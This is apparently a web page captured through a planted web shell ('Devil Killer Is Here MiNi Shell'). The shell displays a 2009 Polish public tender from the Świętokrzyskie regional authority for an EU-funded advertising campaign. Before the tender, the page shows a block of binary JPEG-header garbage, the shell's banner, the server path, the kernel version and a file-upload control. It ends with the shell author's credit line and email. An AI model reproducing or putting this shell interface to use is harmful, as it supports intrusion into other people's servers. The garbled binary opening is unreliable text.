JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23502-N-2009.html

<p class="kh_header"><b>Kielce: Przygotowanie oraz realizacja kampanii reklamowej Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013. Znak sprawy: DOA.III.3323-1/09</b><br>
<b>Numer ogłoszenia: 23502 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie oraz realizacja kampanii reklamowej Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013. Znak sprawy: DOA.III.3323-1/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na przygotowaniu oraz realizacji kampanii reklamowej Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013, zwanej dalej kampanią RPOWŚ. 
2.Celem kampanii RPOWŚ jest :
a. udowanie świadomości społecznej dotyczącej istnienia RPOWŚ w Województwie Świętokrzyskim,
b. utrwalenie w świadomości społecznej przekonania, że wdrażanie RPOWŚ przyczynia się do poprawy poziomu życia mieszkańców Województwa oraz rozwoju regionu,
c. budowa pozytywnego wizerunku funduszy strukturalnych -Europejskiego Funduszu Rozwoju Regionalnego, jako źródła finansowania RPOWŚ, 
d. zachęcenie potencjalnych beneficjentów do korzystania z RPOWŚ,
e. rozpowszechnienie informacji na temat RPOWŚ oraz możliwościach korzystania 
z dofinansowania.
3. Kampania RPOWŚ skierowana będzie do grupy docelowej: ogół społeczeństwa Województwa Świętokrzyskiego (18+) w tym potencjalni beneficjenci RPOWŚ.
4. Kampania RPOWŚ realizowana będzie na poziomie regionalnym (obszar województwa świętokrzyskiego).
5. Zakres obowiązków Wykonawcy (zgodnie z założeniami Zamawiającego określonymi w Załączniku nr 1 do SIWZ), tj.:
I. Produkcja spotu telewizyjnego.
II. Emisja spotu telewizyjnego w telewizji regionalnej.
III. Produkcja spotu radiowego.
IV. Emisja spotu radiowego w regionalnych stacjach radiowych.
V. Druk, montaż, ekspozycja i demontaż plakatów reklamowych na nośnikach wielkoformatowych. 
VI. Emisja layoutów (ogłoszeń) prasowych w regionalnej gazecie.
VII. Emisja artykułów sponsorowanych w regionalnej gazecie. 
VIII. Druk broszur informacyjnych.
IX. Emisja reklamy na autobusach komunikacji miejskiej. 
X. Opracowanie raportu ewaluacyjnego.
6. Szczegółowy opis zadań składających się na przedmiot zamówienia zawiera Załącznik nr 1 do SIWZ.
7. Wykonawca będzie zobowiązany do równoczesnego (zwarta kampania) przeprowadzenia wszelkich zadań składających się na kampanię RPOWŚ.
8. Wykonawca zobowiązany będzie przeprowadzać z Zamawiającym na każdym etapie prac objętych przedmiotem zamówienia konsultacje merytoryczne oraz spotkania przedstawicieli stron. W takim przypadku Wykonawca zawiadomi Zamawiającego o w/w na 2 dni robocze przed planowanym terminem spotkania wraz z podaniem tematu spotkania. 
9. Wykonawca zobowiązany będzie przedstawić Zamawiającemu, w terminie 7 dni od dnia podpisania umowy, Szczegółowy Harmonogram Prac obejmujący poszczególne zadania składające się na realizację zamówienia w ramach 3 etapów wraz z podaniem planowanych terminów, przy uwzględnieniu sugestii Zamawiającego określonych w SIWZ. 
Wyodrębnienie w ramach Szczegółowego Harmonogramu Prac etapów służy jedynie określeniu sposobu dokonywania rozliczeń między Zamawiającym a Wykonawcą, zgodnie ze szczegółowymi postanowieniami zawartymi w Załączniku nr 7 do SIWZ Wzór umowy.
10. Wykonawca zobowiązany będzie do udzielania pełnej informacji na temat postępu i zakresu wykonywanych prac na każde żądanie Zamawiającego lub osoby wskazanej przez Zamawiającego.
11. Wykonawca zobowiązany będzie do bezpłatnego przeniesienia majątkowych praw autorskich do spotu telewizyjnego, spotu radiowego oraz raportu ewaluacyjnego bez ograniczeń czasowych i terytorialnych na określonych w dodatku nr 7 do SIWZ polach eksploatacji. 
12. Szczegółowe zasady określające sposób realizacji zamówienia, rozliczeń, wysokość kar umownych zawarte zostały w dodatku nr 7 do SIWZ - Wzór umowy.
13. Wykonawca zobowiązany będzie do wyprodukowania spotu telewizyjnego oraz radiowego w jakości wymaganej przez emitenta spotu.
14. Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w swojej ofercie części zamówienia, którą zamierza powierzyć podwykonawcom.
15. Rozliczenia między Zamawiającym i Wykonawcą prowadzone będą w złotych polskich..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.34.14.00-0, 92.11.12.10-7, 92.20.00.00-3, 22.46.20.00-6, 22.14.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia przez Wykonawców wadium, którego wysokość 
ustalona została na kwotę: 6 000,00 złotych (słownie: sześć tysięcy złotych)
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a. pieniądzu;
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c. gwarancjach bankowych;
d. gwarancjach ubezpieczeniowych;
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Wadium musi być wniesione przez Wykonawców przed upływem terminu wyznaczonego do składania ofert.
4. W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto Zamawiającego.
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego wg danych: 
Nazwa banku i nr konta zamawiającego: 
BGŻ OR Kielce
16 2030 0045 1110 0000 0114 2380
Tytuł wpłaty: 
Wadium - przetarg nieograniczony, na usługę przygotowania oraz realizacji wizerunkowej kampanii reklamowej promującej Regionalny Program Operacyjny Województwa Świętokrzyskiego na lata 2007 - 2013.
6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7. Wadium wnoszone w formach, o których mowa w pkt 2 lit b - e musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę na cały okres, na jaki Wykonawca jest związany ofertą, tj. na okres 30 dni licząc od dnia otwarcia ofert. Dokument taki musi zawierać bezwarunkowe zobowiązanie wypłacenia Zamawiającemu przez poręczyciela lub gwaranta kwoty wadium w przypadkach, o których mowa w pkt 12i 13 niniejszego rozdziału. Dokument może zostać załączony do oferty lub złożony w oddzielnej kopercie w siedzibie Zamawiającego, pok. 146 przed upływem terminu wyznaczonego do składania ofert.
8. Zamawiający zwróci niezwłocznie wadium Wykonawcom, jeżeli:
a. upłynął termin związania ofertą,
b. zawarto umowę w sprawie zamówienia publicznego,
c. Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
9. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a. który wycofał ofertę przed upływem terminu składania ofert; 
b. który został wykluczony z postępowania; 
c. którego oferta została odrzucona.
10. Zamawiający żądać będzie ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt. 9 lit. b i c, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
11. Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1. Spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy, tj. 
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
a) w okresie ostatnich 3 lat przed wszczęciem postępowania lub w okresie prowadzenia działalności, jeżeli okres ten jest krótszy wykonali min. 1 usługę odpowiadającą przedmiotowi zamówienia, której łączna wartość wynosi 500 000,00 złotych brutto. 
Przez usługę odpowiadającą przedmiotowi zamówienia Zamawiający rozumie:
- usługę polegająca na przeprowadzeniu kampanii reklamowej, polegającej na wyprodukowaniu oraz wyemitowaniu w telewizji i/lub radio spotu reklamowego telewizyjnego i/lub radiowego,
- usługę polegająca na przeprowadzeniu kampanii reklamowej przy wykorzystaniu nośników takich jak: prasa, reklama wielkoformatowa (bilbord), broszury (ulotki). 
Dla spełnienia warunku udziału w postępowaniu, o którym mowa w pkt 1.2 lit.a niniejszego rozdziału, Wykonawca musi wykazać się realizacją w/w usług w ramach jednego lub kilku zamówień.
b) utworzą do realizacji zamówienia zespół 3 osób składający się co najmniej z:
- kierownika zespołu - posiadającego wykształcenie co najmniej wyższe, min. 2 lata doświadczenia w zakresie public relations, reklamy, promocji lub marketingu, który kierował min. 2 (dwiema) kampaniami reklamowymi, 
- zespół min. 2 osób, które posiadają wykształcenie co najmniej średnie, min 1 rok doświadczenia w zakresie public relations, reklamy, promocji lub marketingu, którzy brali udział w realizacji min. 2 (dwóch) kampanii reklamowych. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym spółki cywilne) spełniają powyższe warunki (opisane w pkt 1.2 lit a i b) w przypadku, gdy mogą wykazać się ich spełnieniem łącznie.
2. Spełniają warunki określone w art. 22 ust. 1 pkt 4 ustawy, tj. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy;
3. Zamawiający oceni spełnienie warunków udziału w postępowaniu metodą zero - jedynkową, tj. wg zasady spełnia/nie spełnia, na podstawie dokumentów dołączonych do oferty, które zostały wyszczególnione w rozdziale VI niniejszej SIWZ.
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (dotyczy również spółki cywilnej). W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5. Do Wykonawców wspólnie ubiegających się o zamówienie publiczne stosuje się przepisy dotyczące Wykonawców, tj. każdy z Wykonawców oddzielnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, a także musi spełnić wymogi, o których mowa w art. 22 ust. 1 ustawy. Dla potwierdzenia spełnienia warunków, o których mowa powyżej, każdy Wykonawca oddzielnie składa oświadczenie i dokumenty wskazane w rozdziale VI pkt 3 lit a, b, c, d albo pkt 5, 6 SIWZ. Spełnieniem warunku opisanego w pkt 1.2. a i b niniejszego rozdziału będzie łączne wykazanie się przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczeniami i dokumentami wskazanymi w rozdz. VI pkt. 3 lit. e, f SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy przystępujący do postępowania zobowiązani są do złożenia ofert, składających się z następujących dokumentów:
1. Wypełnionego Formularza ofertowego- wg wzoru określonego w dodatku nr 1 do SIWZ;
2. Wypełnionego Formularza cenowego - wg wzoru określonego w dodatku nr 2 do SIWZ;
3. Dokumentów potwierdzających spełnienie warunków podmiotowych i przedmiotowych udziału w postępowaniu:
a) oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy - wg wzoru określonego w dodatku nr 3 do SIWZ,
b) aktualnego odpisu z właściwego rejestru albo właściwego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert. W przypadku składania oferty przez Wykonawcę prowadzącego działalność gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej, powyższy warunek spełniać będzie również dokument wystawiony z datą wcześniejszą, przy obligatoryjnym wymogu potwierdzenia w w/w terminie jego aktualności przez organ wydający; 
c) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
d) aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e) wykazu wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swym rodzajem i wartością usługom stanowiącym przedmiot zamówienia (zgodnie z rozdz. V pkt 1.2. lit a SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały zrealizowane należycie -wg wzoru określonego w dodatku nr 4 do SIWZ,
f) wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia (zgodnie z rozdz. V pkt 1.2. lit. b SIWZ) niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru określonego w dodatku nr 5 do SIWZ,
g) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 3 lit. f) Wykonawca wskazał osoby, którymi będzie dysponować - wg wzoru określonego w dodatku nr 6 do SIWZ.
4. W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia publicznego (konsorcjum, spółka cywilna) zobowiązani są przedłożyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
5. W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu o którym mowa w pkt. 3 lit b, c, d zobowiązany jest załączyć dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, nie zalega z uiszczeniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty powinny być wystawione z zachowaniem wymaganych terminów, odpowiednio wg zasad określonych dla dokumentów wymienionych w pkt 5 niniejszego rozdziału.
7. Zamawiający wymaga, aby załączone do oferty dokumenty sporządzone w języku obcym złożone zostały wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sejmik.kielce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach
Al. IX Wieków Kielc 3,
25-516 Kielce,
bud. C-2, pok. 344, III piętro..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 11:30, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach
Al. IX Wieków Kielc 3,
25-516 Kielce,
bud. C-2, pok. 146 (Kancelaria ogólna), I pietro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com